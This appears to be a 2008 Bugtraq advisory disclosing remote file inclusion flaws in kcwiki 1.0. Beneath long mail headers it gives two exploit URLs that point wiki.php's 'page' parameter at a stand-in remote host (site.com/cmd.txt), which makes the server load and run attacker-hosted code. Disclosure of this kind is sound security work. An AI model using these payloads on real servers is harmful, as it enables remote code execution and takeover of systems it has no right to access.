kcwiki 1.0 multiple remote file inclusion vulnerabilities.
- To: bugtraq <bugtraq@xxxxxxxxxxxxxxxxx>
- Subject: kcwiki 1.0 multiple remote file inclusion vulnerabilities.
- From: "muuratsalo experimental hack lab" <muuratsalo@xxxxxxxxx>
- Date: Mon, 3 Mar 2008 00:40:28 +0100
- Dkim-signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; bh=+S/1o30MUTzJfYcoma1BS2xrZ74HPCDxGGhLgJNEluE=; b=ltTWStpmCru486TcYqTBq8iXy/a+pYGH5YLPXu4ODt5YliNF+c4iQ2ZLgb0UduHjDJDf+NMxhfNsuZ0bMs9bTtup+xrEsNC7q4S+GH6Ycglfwq3mwv0RAC+l2ssiTRAuKhmdCLhNXtVykLfIpiGpKciPR6RmjmbPyGI/yhQxTTA=
- Domainkey-signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition; b=wX8fcLUDShl/jafy4duo5VWbijWlWR5HmpDde9uZ0Iz6cjfDFMhrXjgkCdDwebpKez2tgNf1EyIWOSaKyxUFa6UVFZ7grgAkfajhugBSzmvfA/Op1e5CC8dWZf/Z8IoRRT0JFVD9qYPWzv7A6w1z8v1NeCWnpBwqBoxAqY0+gyc=
- List-help: <mailto:bugtraq-help@securityfocus.com>
- List-id: <bugtraq.list-id.securityfocus.com>
- List-post: <mailto:bugtraq@securityfocus.com>
- List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
- List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
- Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
kcwiki 1.0 multiple remote file inclusion vulnerabilities
download http://sourceforge.net/projects/kcwiki/
author muuratsalo
contact muuratsalo[at]gmail.com
exploits
http://localhost/kcwiki-1_0-20051129/minimal/wiki.php?page=http://www.site.com/cmd.txt?
http://localhost/kcwiki-1_0-20051129/simplest/wiki.php?page=http://www.site.com/cmd.txt?